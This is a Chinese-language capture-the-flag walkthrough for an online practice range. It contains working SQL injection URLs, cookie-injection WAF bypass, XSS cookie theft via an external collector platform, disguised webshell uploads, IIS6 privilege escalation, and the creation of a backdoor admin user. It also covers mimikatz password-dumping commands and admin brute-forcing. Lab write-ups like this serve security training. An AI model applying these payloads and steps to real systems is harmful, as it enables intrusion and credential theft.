尤里的复仇Ⅰ 小芳!【8题】
封神台-掌控安全在线演练靶场
第一章:为了女神小芳!
没有防护的sql注入,查看到有sql注入点
http://rhiq8003.ia.aqlab.cn/?id=1 or 1=1
通过测试,此payload适合注入,查看字段
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 2
发现字段数位2
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 3
查看数据库和用户名,并得知显示第二个字段
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select user(),database()
查表
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema='maoshe'
查字段
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name='admin'
因为只显示一个字段,故可用limit
达到输出第1,2,3个数据等
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name='admin' limit 1,1
查到第三个数据的字段位password
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name='admin' limit 2,1
查字段的内容,得到flag
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,password from admin
第二章:遇到阻难!绕过WAF过滤!
当点击新闻时,会出现?id=
,测试发现注入点
http://kypt8004.ia.aqlab.cn/shownews.asp?id=169 order by 10
发现有10个字段
http://kypt8004.ia.aqlab.cn/shownews.asp?id=169 order by 11
很多sql语句被黑名单限制
尝试之后发现可用使用cookie注入,有注入点
尝试union select 1,2,3,4,5,6,7,8,9,10
提示数据库出错,再尝试猜测字段admin是否在库中,union select 1,2,3,4,5,6,7,8,9,10 from admin
,正确回显了可显示的字段:2.7.8.9
在可显示的字段位数上查询admin表里是否存在username
和password
,结果显示了存在username和password
用MD5解密passsword
再御剑扫出后台
登录后台登录系统
第三章:为了更多的权限!留言板!
使用xss平台(https://xss8.cc),接收到管理员的cookie
首先创建一个项目
勾选这两个选项
将下面的代码复制到存在xss漏洞的地方
在到平台查看结果,得到cookie,里面存在flag
第四章:进击!拿到Web最高权限!
将此cookie复制到下面的登录页面
使用后台管理者的cookie直接登录到后台
找到上传webshell的位置
上传1.asp,被拦截
将1.asp与图片合成一张新的图片,变成2.gif
将2.gif改为2.cer再上传
用蚁剑连接
得到flag
第五章:SYSTEM!POWER!
我使用蚁剑会出错,之后就换成菜刀了
iis6.exe提权是利用iis6.0远程代码执行漏洞获取到一个webshell之后,进行的提权操作
这里没有使用cmd和iis.exe,没有查看权限
将cmd.exe和iis6.exe上传,这里已经有人上传过了,直接拿来用iis6.exe
这里使用了cmd,没有使用iis.exe,是普通权限
使用iis.exe提权,得到系统权限
添加新用户
将用户添加到Administrator组里
tasklist -svc
查看远程服务的进程号了,2444为远程服务的进程号
之后根据进程号查看开启的端口时多时
netstat
查看端口号,开启了3389,可进行远程连接
(这两个步骤验证远程连接的端口号)
ping 域名
可查看到ip
ip+端口号
连接到目标主机,查看到flag
第六章:GET THE PASS!
发现压缩包没有查看权限,可更改权限
将拒绝上面的勾全部取消
发现查看需要管理员的登录密码
使用mimikatz抓取密码
privilege::debug
,提升权限
sekurlsa::logonpasswords
导出明文密码,得到密码:wow!yougotit!
访问文件,得到flag
萌新也能找CMS漏洞
方法一:
在更改信息时,上传1.php,将content-type类型改为图片类型image/jpeg
上传成功
指向图片,复制图片 地址
用菜刀连接,得到flag
不过flag不对,提交显示错误,(还有其他方法)
方法二:
源代码审计
在ad_js.php里面传入的ad_id参数并没有过滤sql注入的相关字符,故可从此注入
查字段为7个字段
只有字段7显示内容
ming查库
查表,这里转义了'
,变成了\'
,故可以使用0x626c75655f74657374
(用16进制时,不需要加引号,并且前面需加0x)代替'blue_test'
查字段
查字段内容,得到用户名与密码,密码需md5解密
下面网址的报错注入,我没有测试,你们可以测试一下
基础工具运用:爆破管理员账户登录后台
找到后台登录页面
http://rhiq8003.ia.aqlab.cn/dami_777/dami_888/admin.php
开始爆破
登录得到flag